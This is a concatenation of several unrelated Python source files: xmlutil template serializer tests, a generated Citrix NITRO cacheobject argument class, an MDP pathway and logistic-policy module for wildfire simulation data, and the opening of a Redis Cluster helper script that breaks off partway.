        for idx in range(len(obj)):
            self.assertEqual(obj[idx], elems[idx][0].tag)
class TemplateTest(test.TestCase):
    """Tests for xmlutil.Template and its Master/Slave subclasses."""

    def test_wrap(self):
        """unwrap() exposes the root element; wrap() returns the template."""
        # These are strange methods, but they make things easier
        elem = xmlutil.TemplateElement('test')
        tmpl = xmlutil.Template(elem)
        self.assertEqual(elem, tmpl.unwrap())
        self.assertEqual(tmpl, tmpl.wrap())

    def test__siblings(self):
        """A plain Template's only sibling is its own root element."""
        # Set up a basic template
        elem = xmlutil.TemplateElement('test')
        tmpl = xmlutil.Template(elem)
        # Check that we get the right siblings
        siblings = tmpl._siblings()
        self.assertEqual(1, len(siblings))
        self.assertEqual(elem, siblings[0])

    def test__splitTagName(self):
        """Tag names split on ':' but not inside '{namespace}' braces."""
        test_cases = [
            ('a', ['a']),
            ('a:b', ['a', 'b']),
            ('{http://test.com}a:b', ['{http://test.com}a', 'b']),
            ('a:b{http://test.com}:c', ['a', 'b{http://test.com}', 'c']),
        ]
        for test_case, expected in test_cases:
            result = xmlutil.TemplateElement._splitTagName(test_case)
            self.assertEqual(expected, result)

    def test__nsmap(self):
        """_nsmap() returns a copy of the template's namespace dictionary."""
        # Set up a basic template
        elem = xmlutil.TemplateElement('test')
        tmpl = xmlutil.Template(elem, nsmap=dict(a="foo"))
        # Check out that we get the right namespace dictionary
        nsmap = tmpl._nsmap()
        # It must be a copy, not the template's own dict
        self.assertNotEqual(id(nsmap), id(tmpl.nsmap))
        self.assertEqual(1, len(nsmap))
        self.assertEqual('foo', nsmap['a'])

    def test_master_attach(self):
        """attach() accepts only applicable slaves whose root tag matches."""
        # Set up a master template
        elem = xmlutil.TemplateElement('test')
        tmpl = xmlutil.MasterTemplate(elem, 1)
        # Make sure it has a root but no slaves
        self.assertEqual(elem, tmpl.root)
        self.assertEqual(0, len(tmpl.slaves))
        # Try to attach an invalid slave
        bad_elem = xmlutil.TemplateElement('test2')
        self.assertRaises(ValueError, tmpl.attach, bad_elem)
        self.assertEqual(0, len(tmpl.slaves))
        # Try to attach an invalid and a valid slave: neither may be kept
        good_elem = xmlutil.TemplateElement('test')
        self.assertRaises(ValueError, tmpl.attach, good_elem, bad_elem)
        self.assertEqual(0, len(tmpl.slaves))
        # Try to attach an inapplicable template
        class InapplicableTemplate(xmlutil.Template):
            def apply(self, master):
                return False
        inapp_tmpl = InapplicableTemplate(good_elem)
        tmpl.attach(inapp_tmpl)
        self.assertEqual(0, len(tmpl.slaves))
        # Now try attaching an applicable template
        tmpl.attach(good_elem)
        self.assertEqual(1, len(tmpl.slaves))
        self.assertEqual(good_elem, tmpl.slaves[0].root)

    def test_master_copy(self):
        """copy() shares root/version/nsmap but clones the slave list."""
        # Construct a master template
        elem = xmlutil.TemplateElement('test')
        tmpl = xmlutil.MasterTemplate(elem, 1, nsmap=dict(a='foo'))
        # Give it a slave
        slave = xmlutil.TemplateElement('test')
        tmpl.attach(slave)
        # Construct a copy
        copy = tmpl.copy()
        # Check to see if we actually managed a copy
        self.assertNotEqual(tmpl, copy)
        self.assertEqual(tmpl.root, copy.root)
        self.assertEqual(tmpl.version, copy.version)
        # nsmap is shared by identity; the slave list is a fresh list with
        # the same members.
        self.assertEqual(id(tmpl.nsmap), id(copy.nsmap))
        self.assertNotEqual(id(tmpl.slaves), id(copy.slaves))
        self.assertEqual(len(tmpl.slaves), len(copy.slaves))
        self.assertEqual(tmpl.slaves[0], copy.slaves[0])

    def test_slave_apply(self):
        """A slave applies when the master's version falls in its range."""
        # Construct a master template
        elem = xmlutil.TemplateElement('test')
        master = xmlutil.MasterTemplate(elem, 3)
        # Construct a slave template with applicable minimum version
        slave = xmlutil.SlaveTemplate(elem, 2)
        self.assertTrue(slave.apply(master))
        # Construct a slave template with equal minimum version
        slave = xmlutil.SlaveTemplate(elem, 3)
        self.assertTrue(slave.apply(master))
        # Construct a slave template with inapplicable minimum version
        slave = xmlutil.SlaveTemplate(elem, 4)
        self.assertFalse(slave.apply(master))
        # Construct a slave template with applicable version range
        slave = xmlutil.SlaveTemplate(elem, 2, 4)
        self.assertTrue(slave.apply(master))
        # Construct a slave template with low version range
        slave = xmlutil.SlaveTemplate(elem, 1, 2)
        self.assertFalse(slave.apply(master))
        # Construct a slave template with high version range
        slave = xmlutil.SlaveTemplate(elem, 4, 5)
        self.assertFalse(slave.apply(master))
        # Construct a slave template with matching version range
        slave = xmlutil.SlaveTemplate(elem, 3, 3)
        self.assertTrue(slave.apply(master))

    def test__serialize(self):
        """Serialize a nested object through a master plus attached slave."""
        # Our test object to serialize
        obj = {'test': {'name': 'foobar',
                        'values': [1, 2, 3, 4],
                        'attrs': {'a': 1,
                                  'b': 2,
                                  'c': 3,
                                  'd': 4, },
                        'image': {'name': 'image_foobar', 'id': 42, }, }, }
        # Set up our master template
        root = xmlutil.TemplateElement('test', selector='test',
                                       name='name')
        value = xmlutil.SubTemplateElement(root, 'value', selector='values')
        value.text = xmlutil.Selector()
        attrs = xmlutil.SubTemplateElement(root, 'attrs', selector='attrs')
        xmlutil.SubTemplateElement(attrs, 'attr', selector=xmlutil.get_items,
                                   key=0, value=1)
        master = xmlutil.MasterTemplate(root, 1, nsmap=dict(f='foo'))
        # Set up our slave template
        root_slave = xmlutil.TemplateElement('test', selector='test')
        image = xmlutil.SubTemplateElement(root_slave, 'image',
                                           selector='image', id='id')
        image.text = xmlutil.Selector('name')
        slave = xmlutil.SlaveTemplate(root_slave, 1, nsmap=dict(b='bar'))
        # Attach the slave to the master...
        master.attach(slave)
        # Try serializing our object
        siblings = master._siblings()
        nsmap = master._nsmap()
        result = master._serialize(None, obj, siblings, nsmap)
        # Now we get to manually walk the element tree...
        self.assertEqual('test', result.tag)
        self.assertEqual(2, len(result.nsmap))
        self.assertEqual('foo', result.nsmap['f'])
        self.assertEqual('bar', result.nsmap['b'])
        self.assertEqual(result.get('name'), obj['test']['name'])
        # Children come in order: the <value> elements, then <attrs>, then
        # the slave-contributed <image>.
        for idx, val in enumerate(obj['test']['values']):
            self.assertEqual('value', result[idx].tag)
            self.assertEqual(str(val), result[idx].text)
        idx += 1
        self.assertEqual('attrs', result[idx].tag)
        for attr in result[idx]:
            self.assertEqual('attr', attr.tag)
            self.assertEqual(str(obj['test']['attrs'][attr.get('key')]),
                             attr.get('value'))
        idx += 1
        self.assertEqual('image', result[idx].tag)
        self.assertEqual(str(obj['test']['image']['id']),
                         result[idx].get('id'))
        self.assertEqual(obj['test']['image']['name'], result[idx].text)

    def test_serialize_with_delimiter(self):
        """':'-delimited tags serialize into nested scope elements."""
        # Our test object to serialize
        obj = {'test': {'scope0:key1': 'Value1',
                        'scope0:scope1:key2': 'Value2',
                        'scope0:scope1:scope2:key3': 'Value3'
                        }}
        # Set up our master template
        root = xmlutil.TemplateElement('test', selector='test')
        key1 = xmlutil.SubTemplateElement(root, 'scope0:key1',
                                          selector='scope0:key1')
        key1.text = xmlutil.Selector()
        key2 = xmlutil.SubTemplateElement(root, 'scope0:scope1:key2',
                                          selector='scope0:scope1:key2')
        key2.text = xmlutil.Selector()
        key3 = xmlutil.SubTemplateElement(root, 'scope0:scope1:scope2:key3',
                                          selector='scope0:scope1:scope2:key3')
        key3.text = xmlutil.Selector()
        serializer = xmlutil.MasterTemplate(root, 1)
        xml_list = []
        xml_list.append("<?xmlversion='1.0'encoding='UTF-8'?><test>")
        xml_list.append("<scope0><key1>Value1</key1><scope1>")
        xml_list.append("<key2>Value2</key2><scope2><key3>Value3</key3>")
        xml_list.append("</scope2></scope1></scope0></test>")
        expected_xml = ''.join(xml_list)
        result = serializer.serialize(obj)
        # All whitespace is stripped before comparing, which is why the
        # expected XML declaration above contains no spaces.
        result = result.replace('\n', '').replace(' ', '')
        self.assertEqual(expected_xml, result)
class MasterTemplateBuilder(xmlutil.TemplateBuilder):
    """Builder that constructs a version-1 master template for the tests."""

    def construct(self):
        # Build a fresh master template around a bare 'test' element.
        return xmlutil.MasterTemplate(xmlutil.TemplateElement('test'), 1)
class SlaveTemplateBuilder(xmlutil.TemplateBuilder):
    """Builder that constructs a version-1 slave template for the tests."""

    def construct(self):
        # Build a fresh slave template around a bare 'test' element.
        return xmlutil.SlaveTemplate(xmlutil.TemplateElement('test'), 1)
class TemplateBuilderTest(test.TestCase):
    """Tests for the template-caching behavior of TemplateBuilder."""

    def test_master_template_builder(self):
        """Master builders cache one template and hand out copies of it."""
        # Make sure the template hasn't been built yet
        self.assertIsNone(MasterTemplateBuilder._tmpl)
        # Now, construct the template
        tmpl1 = MasterTemplateBuilder()
        # Make sure that there is a template cached...
        self.assertIsNotNone(MasterTemplateBuilder._tmpl)
        # Make sure it wasn't what was returned...
        self.assertNotEqual(MasterTemplateBuilder._tmpl, tmpl1)
        # Make sure it doesn't get rebuilt
        cached = MasterTemplateBuilder._tmpl
        tmpl2 = MasterTemplateBuilder()
        self.assertEqual(MasterTemplateBuilder._tmpl, cached)
        # Make sure we're always getting fresh copies
        self.assertNotEqual(tmpl1, tmpl2)
        # Make sure we can override the copying behavior
        tmpl3 = MasterTemplateBuilder(False)
        self.assertEqual(MasterTemplateBuilder._tmpl, tmpl3)

    def test_slave_template_builder(self):
        """Slave builders cache one template and return it directly."""
        # Make sure the template hasn't been built yet
        self.assertIsNone(SlaveTemplateBuilder._tmpl)
        # Now, construct the template
        tmpl1 = SlaveTemplateBuilder()
        # Make sure there is a template cached...
        self.assertIsNotNone(SlaveTemplateBuilder._tmpl)
        # Make sure it was what was returned...
        self.assertEqual(SlaveTemplateBuilder._tmpl, tmpl1)
        # Make sure it doesn't get rebuilt
        tmpl2 = SlaveTemplateBuilder()
        self.assertEqual(SlaveTemplateBuilder._tmpl, tmpl1)
        # Make sure we're always getting the cached copy
        self.assertEqual(tmpl1, tmpl2)
class MiscellaneousXMLUtilTests(test.TestCase):
    """Tests for standalone helpers in the xmlutil module."""

    def test_make_flat_dict(self):
        """make_flat_dict() serializes a flat dict into one wrapper element
        with a child element per key."""
        expected = ("<?xml version='1.0' encoding='UTF-8'?>\n"
                    '<wrapper><a>foo</a><b>bar</b></wrapper>')
        template = xmlutil.MasterTemplate(xmlutil.make_flat_dict('wrapper'), 1)
        serialized = template.serialize(dict(wrapper=dict(a='foo', b='bar')))
        self.assertEqual(expected, serialized)
| |
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
#   Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class cacheobject_args :
    """ Provides additional arguments required for fetching the cacheobject resource.
    """
    # NOTE(review): this class follows the NITRO SDK generated-code pattern;
    # the try/except wrappers around plain attribute access are part of that
    # generated style and are preserved as-is.
    def __init__(self) :
        # Backing fields for the optional query arguments; each is exposed
        # through a matching property below.
        self._url = ""
        self._locator = 0
        self._httpstatus = 0
        self._host = ""
        self._port = 0
        self._groupname = ""
        self._httpmethod = ""
        self._group = ""
        self._ignoremarkerobjects = ""
        self._includenotreadyobjects = ""

    @property
    def url(self) :
        """URL of the particular object whose details is required. Parameter "host" must be specified along with the URL.<br/>Minimum length = 1.
        """
        try :
            return self._url
        except Exception as e:
            raise e

    @url.setter
    def url(self, url) :
        """URL of the particular object whose details is required. Parameter "host" must be specified along with the URL.<br/>Minimum length = 1
        """
        try :
            self._url = url
        except Exception as e:
            raise e

    @property
    def locator(self) :
        """ID of the cached object.
        """
        try :
            return self._locator
        except Exception as e:
            raise e

    @locator.setter
    def locator(self, locator) :
        """ID of the cached object.
        """
        try :
            self._locator = locator
        except Exception as e:
            raise e

    @property
    def httpstatus(self) :
        """HTTP status of the object.
        """
        try :
            return self._httpstatus
        except Exception as e:
            raise e

    @httpstatus.setter
    def httpstatus(self, httpstatus) :
        """HTTP status of the object.
        """
        try :
            self._httpstatus = httpstatus
        except Exception as e:
            raise e

    @property
    def host(self) :
        """Host name of the object. Parameter "url" must be specified.<br/>Minimum length = 1.
        """
        try :
            return self._host
        except Exception as e:
            raise e

    @host.setter
    def host(self, host) :
        """Host name of the object. Parameter "url" must be specified.<br/>Minimum length = 1
        """
        try :
            self._host = host
        except Exception as e:
            raise e

    @property
    def port(self) :
        """Host port of the object. You must also set the Host parameter.<br/>Default value: 80<br/>Minimum value = 1.
        """
        try :
            return self._port
        except Exception as e:
            raise e

    @port.setter
    def port(self, port) :
        """Host port of the object. You must also set the Host parameter.<br/>Default value: 80<br/>Minimum value = 1
        """
        try :
            self._port = port
        except Exception as e:
            raise e

    @property
    def groupname(self) :
        """Name of the content group to which the object belongs. It will display only the objects belonging to the specified content group. You must also set the Host parameter.
        """
        try :
            return self._groupname
        except Exception as e:
            raise e

    @groupname.setter
    def groupname(self, groupname) :
        """Name of the content group to which the object belongs. It will display only the objects belonging to the specified content group. You must also set the Host parameter.
        """
        try :
            self._groupname = groupname
        except Exception as e:
            raise e

    @property
    def httpmethod(self) :
        """HTTP request method that caused the object to be stored.<br/>Default value: GET<br/>Possible values = GET, POST.
        """
        try :
            return self._httpmethod
        except Exception as e:
            raise e

    @httpmethod.setter
    def httpmethod(self, httpmethod) :
        """HTTP request method that caused the object to be stored.<br/>Default value: GET<br/>Possible values = GET, POST
        """
        try :
            self._httpmethod = httpmethod
        except Exception as e:
            raise e

    @property
    def group(self) :
        """Name of the content group whose objects should be listed.
        """
        try :
            return self._group
        except Exception as e:
            raise e

    @group.setter
    def group(self, group) :
        """Name of the content group whose objects should be listed.
        """
        try :
            self._group = group
        except Exception as e:
            raise e

    @property
    def ignoremarkerobjects(self) :
        """Ignore marker objects. Marker objects are created when a response exceeds the maximum or minimum response size for the content group or has not yet received the minimum number of hits for the content group.<br/>Possible values = ON, OFF.
        """
        try :
            return self._ignoremarkerobjects
        except Exception as e:
            raise e

    @ignoremarkerobjects.setter
    def ignoremarkerobjects(self, ignoremarkerobjects) :
        """Ignore marker objects. Marker objects are created when a response exceeds the maximum or minimum response size for the content group or has not yet received the minimum number of hits for the content group.<br/>Possible values = ON, OFF
        """
        try :
            self._ignoremarkerobjects = ignoremarkerobjects
        except Exception as e:
            raise e

    @property
    def includenotreadyobjects(self) :
        """Include responses that have not yet reached a minimum number of hits before being cached.<br/>Possible values = ON, OFF.
        """
        try :
            return self._includenotreadyobjects
        except Exception as e:
            raise e

    @includenotreadyobjects.setter
    def includenotreadyobjects(self, includenotreadyobjects) :
        """Include responses that have not yet reached a minimum number of hits before being cached.<br/>Possible values = ON, OFF
        """
        try :
            self._includenotreadyobjects = includenotreadyobjects
        except Exception as e:
            raise e

    # Enumerations of the allowed values for the arguments above.
    class Includenotreadyobjects:
        ON = "ON"
        OFF = "OFF"

    class Httpmethod:
        GET = "GET"
        POST = "POST"

    class Ignoremarkerobjects:
        ON = "ON"
        OFF = "OFF"
| |
"""
Generic MDP Pathway Module
"""
import numpy, math, scipy.stats
class MDP_Pathway:
    """One simulated pathway (episode) through a generic MDP.

    Holds the chronological sequence of MDP_Event objects, the parameters
    of the policy that generated the pathway, and cumulative/normalization
    bookkeeping values.
    """
    def __init__(self, policy_length):
        # Number of parameters in the generating policy.
        self.policy_length = policy_length
        # Chronological list of MDP_Event objects.
        self.events = []
        self.metadata = {}
        self.ID_number = 0
        #information on the policy which was used when this pathway was generated
        #setting initial values to 1. This will mean that, unless they are explicitly set,
        # J3 weights will be equal to J1 weights.
        self.generation_policy_parameters = [1.0] * policy_length
        self.generation_joint_prob = 1.0
        #other cumulative measures
        self.actions_0_taken = 0
        self.actions_1_taken = 0
        #normalization values, in case original values ever want to be re-calculated
        self.normalized = False
        self.normalization_mags = []
        self.normalization_means = []
        #normalization values for net_value
        self.normalized_value = False
        self.normalized_value_mag = 0.0
        self.normalized_value_mean = 0.0
        self.discount_rate = 1.0
        #to hold the sum of all of this pathway's discounted values
        self.net_value = 0.0

    def set_generation_policy_parameters(self, parameter_list, UPDATE_JOINT_PROB=False):
        """Record the generating policy's parameters.

        When UPDATE_JOINT_PROB is True, also recompute the joint probability
        of this pathway's recorded actions under that policy.
        """
        self.generation_policy_parameters = parameter_list
        if UPDATE_JOINT_PROB:
            # BUG FIX: the scratch policy must actually be given the
            # parameters. Previously it was left at its all-zero defaults,
            # so every action probability came out as logistic(0) = 0.5.
            # (The policy is now also only constructed when it is needed.)
            pol = MDP_Policy(self.policy_length)
            pol.set_params(parameter_list)
            joint_p = 1.0
            for ev in self.events:
                joint_p *= pol.calc_action_prob(ev)
            self.generation_joint_prob = joint_p

    def update_net_value(self):
        """Sums the rewards from every event and records the value in self.net_value"""
        value = 0
        for ev in self.events:
            # Discount each event's total reward by its sequence position.
            value += sum(ev.rewards) * pow(self.discount_rate, ev.sequence_index)
        self.net_value = value

    def strip_metadata(self):
        """Discard the metadata dictionary (e.g. to shrink stored pathways)."""
        self.metadata = None
class MDP_Event:
    """A single state/action/reward record within an MDP pathway."""
    def __init__(self, sequence_index):
        """Instantiation

        Arguments:
        sequence_index: integer: refers to the step in the MDP in which this event took place. It is
            used to compute the discount to apply to this event, according to this pathway's discount rate.
        """
        self.sequence_index = sequence_index
        self.state_length = 0
        self.state = []
        self.action = False
        self.action_prob = 0.5    #probability of taking this action
        self.decision_prob = 0.5  #probability of doing what we did
        self.rewards = []
        self.metadata = {}

    def set_states(self, state_list):
        """Store the state features as a compact numpy array."""
        self.state = convert_to_array(state_list)
        self.state_length = len(self.state)

    def set_actions(self, action):
        """Record whether the action was taken (boolean)."""
        self.action = action

    def set_action_probabilities(self, action_prob):
        """Record the probability of taking this action.

        BUG FIX: this previously assigned to a misspelled attribute
        ('action_probs'), leaving self.action_prob (the attribute read by
        KLD and the converters) untouched.
        """
        self.action_prob = action_prob

    def set_rewards(self, reward_list):
        """Store the rewards as a compact numpy array."""
        self.rewards = convert_to_array(reward_list)

    def set_meta_data(self, meta_data_dictionary):
        """Attach an arbitrary metadata dictionary to this event."""
        self.metadata = meta_data_dictionary
class MDP_Policy:
    """A logistic (binary-action) policy over MDP state features."""
    def __init__(self, policy_length):
        #TODO unlock multiple actions
        # Policy parameters (betas), one per state feature.
        self.b = [0]*policy_length
        # The logistic function can produce probabilities of (effectively)
        # 0 for very low cross products, which would zero out the product of
        # any series of event probabilities, so a floor is enforced.
        self.probability_lower_limit = 0.001
        # Symmetrically, a decision that goes AGAINST a probability-1 rule
        # would also yield an effective probability of 0, so there is a
        # ceiling as well.
        self.probability_upper_limit = 0.999

    def set_params(self, parameter_list):
        """Replace the policy parameters with a copy of parameter_list."""
        #TODO unlock multiple actions
        self.b = parameter_list[:]

    def get_params(self):
        """Return the current parameter list."""
        #TODO unlock multiple actions
        return self.b

    def cross_product(self, feature_list):
        """Dot product of the given features with the policy's betas."""
        #TODO unlock multiple actions (multple cross products? or else which crossproduct?)
        total = 0.0
        for idx, feature in enumerate(feature_list):
            total += feature * self.b[idx]
        return total

    def calc_prob(self, feature_list):
        """Probability of making a decision given a set of features,
        clamped into [probability_lower_limit, probability_upper_limit]."""
        #TODO unlock multiple actions
        cp = self.cross_product(feature_list)
        try:
            # Clamp the raw logistic value into the allowed band.
            return min(max(logistic(cp), self.probability_lower_limit),
                       self.probability_upper_limit)
        except(OverflowError):
            print("FGPolicy.calcProb() encountered and overflow error:")
            print("  crossproduct is: " + str(cp))
            return 0.0

    def calc_action_prob(self, MDP_event):
        """Probability, under this policy, of the action the event recorded."""
        #TODO unlock multiple actions
        p_take = self.calc_prob(MDP_event.state)
        # If the action was taken return p(take); otherwise p(not take).
        return p_take if MDP_event.action else 1.0 - p_take
#################################################################
# MODULE-LEVEL FUNCTIONS
#################################################################
def convert_to_array(numeric_list):
    """Convert a numeric list into a compact numpy array.

    A float16 array is used when any value lies strictly between -10 and
    10 (where integer truncation would lose the most information);
    otherwise an int16 array is used.
    """
    use_float = any((-10 < value < 10) for value in numeric_list)
    dtype = "float16" if use_float else "int16"
    return numpy.array(numeric_list, dtype)
def convert_SWIMM_pathway_to_MDP_pathway(SWIMM_pathway):
    """ Converts a SWIMM pathway into a generic MDP_Pathway object and returns it"""
    # SWIMM policies always have exactly two parameters.
    pathway = MDP_Pathway(2)
    pathway.ID_number = SWIMM_pathway["ID Number"]
    pathway.net_value = SWIMM_pathway["Total Pathway Value"]
    pathway.actions_1_taken = SWIMM_pathway["Suppressions"]
    pathway.actions_0_taken = SWIMM_pathway["Timesteps"] - SWIMM_pathway["Suppressions"]
    pathway.generation_joint_prob = SWIMM_pathway["Joint Probability"]
    pathway.set_generation_policy_parameters(SWIMM_pathway["Generation Policy"][:])
    # Each SWIMM state record is laid out as:
    #   [ev, choice, choice_prob, policy_value, this_state_value, i]
    for seq, record in enumerate(SWIMM_pathway["States"]):
        event = MDP_Event(seq)
        event.state_length = 2
        # The leading 1 acts as the constant/bias feature.
        event.state = [1, record[0]]
        event.action = record[1]
        event.decision_prob = record[2]
        event.action_prob = record[3]
        event.rewards = [record[4]]
        pathway.events.append(event)
    return pathway
def convert_firegirl_pathway_to_MDP_pathway(firegirlpathway):
    """Converts a FireGirlPathway object to the generic MDP_Pathway object and returns it

    Each FireGirlIgnitionRecord becomes one MDP_Event; cumulative action
    counts and the joint decision probability are accumulated along the way,
    and selected pathway-level settings are copied into metadata.
    """
    #create new MDP_Pathway with the appropriate policy length
    fg_pol_len = len(firegirlpathway.Policy.b)
    new_MDP_pw = MDP_Pathway(fg_pol_len)
    #setting other values
    new_MDP_pw.policy_length = fg_pol_len
    new_MDP_pw.ID_number = firegirlpathway.ID_number
    new_MDP_pw.net_value = firegirlpathway.net_value
    for i in range(len(firegirlpathway.ignition_events)):
        #create a new MDP_Event and populate it based on the FireGirlIgnitionRecord
        event = MDP_Event(i)
        event.sequence_index = i
        event.state_length = fg_pol_len
        event.state = firegirlpathway.ignition_events[i].features[:]
        event.action = firegirlpathway.ignition_events[i].policy_choice
        event.action_prob = firegirlpathway.ignition_events[i].policy_prob
        # decision_prob is the probability of what actually happened:
        # p(action) when it was taken, 1 - p(action) when it was not.
        if event.action:
            event.decision_prob = event.action_prob
            new_MDP_pw.actions_1_taken += 1
        else:
            event.decision_prob = 1 - event.action_prob
            new_MDP_pw.actions_0_taken += 1
        #and add (well, multiply) this to the joint probability
        new_MDP_pw.generation_joint_prob *= event.decision_prob
        # Rewards: suppression cost is negated (it is a cost); logging
        # totals count as income.
        event.rewards = [-1* firegirlpathway.yearly_suppression_costs[i],
                         firegirlpathway.yearly_logging_totals[i]
                        ]
        #setting metadata for everything else
        event.metadata["Growth Total"] = firegirlpathway.yearly_growth_totals[i]
        event.metadata["Location X"] = firegirlpathway.ignition_events[i].location[0]
        event.metadata["Location Y"] = firegirlpathway.ignition_events[i].location[1]
        event.metadata["Year"] = firegirlpathway.ignition_events[i].year
        event.metadata["Timber Loss"] = firegirlpathway.ignition_events[i].outcomes[0]
        event.metadata["Cells Burned"] = firegirlpathway.ignition_events[i].outcomes[1]
        #event.metadata["Suppression Cost"] = firegirlpathway.ignition_events[i].outcomes[2] #already in the rewards list
        event.metadata["Burn Time"] = firegirlpathway.ignition_events[i].outcomes[3]
        #add the new MDP_event to the list
        new_MDP_pw.events.append(event)
    #done converting all FireGirlIgnitionRecord objects to MDP_Event objects
    #now that events are built, fill in the generation policy stuff
    #this will set MDP_Pathway.generation_policy_parameters and
    # MDP_Pathway.generation_joint_prob
    new_MDP_pw.set_generation_policy_parameters(firegirlpathway.Policy.b[:], UPDATE_JOINT_PROB=True)
    #setting selected metadata
    new_MDP_pw.metadata["Width"] = firegirlpathway.width
    new_MDP_pw.metadata["Height"] = firegirlpathway.height
    #new_MDP_pw.metadata["Window NW"] = firegirlpathway.window_NW
    #new_MDP_pw.metadata["Window SE"] = firegirlpathway.window_SE
    #new_MDP_pw.metadata["Temperature - Summer High"] = firegirlpathway.temp_summer_high
    #new_MDP_pw.metadata["Temperature - Winter Low"] = firegirlpathway.temp_winter_low
    #new_MDP_pw.metadata["Temperature - Variance"] = firegirlpathway.temp_var
    #new_MDP_pw.metadata["Wind - Mean"] = firegirlpathway.wind_mean
    #new_MDP_pw.metadata["Fire - Input Scale"] = firegirlpathway.fire_param_inputscale
    #new_MDP_pw.metadata["Fire - Output Scale"] = firegirlpathway.fire_param_outputscale
    #new_MDP_pw.metadata["Fire - Zero-Adjust"] = firegirlpathway.fire_param_zeroadjust
    #new_MDP_pw.metadata["Fire - Smoothness"] = firegirlpathway.fire_param_smoothness
    new_MDP_pw.metadata["Fire - Reach"] = firegirlpathway.fire_param_reach
    #new_MDP_pw.metadata["Spread - Minimum Wind Plus Temperature"] = firegirlpathway.min_spread_windtemp
    #new_MDP_pw.metadata["Spread - Minimum Fuel"] = firegirlpathway.min_spread_fuel
    #new_MDP_pw.metadata["Crownfire - Input Scale"] = firegirlpathway.crownfire_param_inputscale
    #new_MDP_pw.metadata["Crownfire - Output Scale"] = firegirlpathway.crownfire_param_outputscale
    #new_MDP_pw.metadata["Crownfire - Zero-Adjust"] = firegirlpathway.crownfire_param_zeroadjust
    #new_MDP_pw.metadata["Crownfire - Smoothness"] = firegirlpathway.crownfire_param_smoothness1
    new_MDP_pw.metadata["Fire - Average End Day"] = firegirlpathway.fire_average_end_day
    new_MDP_pw.metadata["Suppression - Effect Percent"] = firegirlpathway.fire_suppression_rate
    new_MDP_pw.metadata["Suppression - Cost Per Cell"] = firegirlpathway.fire_suppression_cost_per_cell
    new_MDP_pw.metadata["Suppression - Cost Per Day"] = firegirlpathway.fire_suppression_cost_per_day
    #new_MDP_pw.metadata["Growth - Timber Constant"] = firegirlpathway.growth_timber_constant
    new_MDP_pw.metadata["Growth - Fuel Accumulation"] = firegirlpathway.growth_fuel_accumulation
    new_MDP_pw.metadata["Growth - Model Number"] = firegirlpathway.using_growth_model
    new_MDP_pw.metadata["Logging - Block Width"] = firegirlpathway.logging_block_width
    new_MDP_pw.metadata["Logging - Minimum Timber Value"] = firegirlpathway.logging_min_value
    new_MDP_pw.metadata["Logging - Slash Remaining"] = firegirlpathway.logging_slash_remaining
    new_MDP_pw.metadata["Logging - Percent of Increment"] = firegirlpathway.logging_percentOfIncrement
    new_MDP_pw.metadata["Logging - Max Cuts"] = firegirlpathway.logging_max_cuts
    return new_MDP_pw
def logistic(value):
    """Return the standard logistic function 1 / (1 + e^(-value)).

    A very negative input overflows math.exp(-value); in that case the true
    logistic value underflows toward zero, so 0.0 is returned.
    """
    #TODO check for overflow conditions to help save time, instead of casting exceptions
    try:
        return 1.0 / (1.0 + math.exp(-value))
    except OverflowError:
        return 0.0
def crossproduct(vector1, vector2):
    """Return the dot product of two equal-length vectors.

    (Named 'crossproduct' for historical reasons.)  Prints an error and
    returns None when the lengths differ.
    """
    # Guard clause: a dot product is undefined for mismatched lengths here.
    if len(vector1) != len(vector2):
        print("Error in MDP.crossproduct(v1, v2)... vectors are not of equal length.")
        return None
    total = 0
    for a, b in zip(vector1, vector2):
        total += a * b
    return total
def KLD(pathways, new_pol):
    """
    Kullback-Leibler divergence of the policy `new_pol` from the "true"
    policy, taken to be whichever policy generated the given pathways.

    ARGUMENTS
    pathways: a list of MDP.Pathway objects
    new_pol: a list containing the parameters of the policy under question

    EXPLANATION
    For every event in every pathway, pk holds the action probability that
    was recorded when the pathway was generated, and qk holds the
    probability of the same action under new_pol.  The divergence is
        KLD = SUM_i( P(i) * ln(P(i)/Q(i)) )
    over all events i.  scipy.stats.entropy(pk, qk) computes exactly this,
    normalizing both lists so they each sum to one first.
    """
    pk = [ev.action_prob
          for pw in pathways
          for ev in pw.events]
    qk = [logistic(crossproduct(new_pol, ev.state))
          for pw in pathways
          for ev in pw.events]
    return scipy.stats.entropy(pk, qk)
| |
#!/usr/bin/env python
import os
import re
import sys
import time
import subprocess
import os
import yaml
import sys, time
import operator
import random
from collections import defaultdict
from operator import itemgetter
def parse_entry(e):
    """Turn one whitespace-split CLUSTER NODES line into a field dict.

    Fields beyond the eighth are the slot ranges served by the node.
    """
    entry = {
        'id': e[0],
        'address': e[1],
        'flags': e[2].split(','),
        'slaveof': e[3],
        'ping_sent': e[4],
        'ping_recv': e[5],
        'config_epoch': e[6],
        'link_status': e[7],
        'slots': e[8:],
    }
    return entry
# str_out = '3e3a6cb0d9a9a87168e266b0a0b24026c0aae3f0 127.0.0.1:7001 master - 0 1385482984082 0 connected 5960-10921\n2938205e12de373867bf38f1ca29d31d0ddb3e46 127.0.0.1:7002 master - 0 1385482983582 0 connected\n97a3a64667477371c4479320d683e4c8db5858b1 :0 myself,master - 0 0 0 connected 0-5959 10922-11422\n'
def parse_config(str_out):
    """Parse raw CLUSTER NODES output into a list of node dicts.

    Returns a real list (not a lazy map object) so callers can index and
    re-iterate the result identically under Python 2 and Python 3; under
    Python 3 the previous map() call returned a one-shot iterator.
    """
    entries = [e.split() for e in str_out.split('\n') if len(e) > 0]
    return [parse_entry(e) for e in entries]
class RedisClient:
    def __init__(self, port):
        """Wrap `src/redis-cli -p <port>` invocations for one local node."""
        self.port = port
        # Path to the redis-cli binary, relative to the working directory.
        self.command = "src/redis-cli"
        # NOTE(review): token_no appears unused by the methods visible here.
        self.token_no = 56
        # Total number of hash slots in a Redis Cluster.
        self.max_slot = 16384
    def ping(self):
        """Send PING to this node.

        Returns (True, output) on success, or (False, None) if redis-cli
        exits nonzero.
        """
        try:
            out = subprocess.check_output([self.command, '-p', str(self.port), 'ping'])
            return (True, out)
        except subprocess.CalledProcessError as e:
            print "ERR ping {0}".format(e.output)
            return (False, None)
    def cluster_meet(self, seed):
        """Issue CLUSTER MEET toward `seed` ('ip:port') so the nodes join.

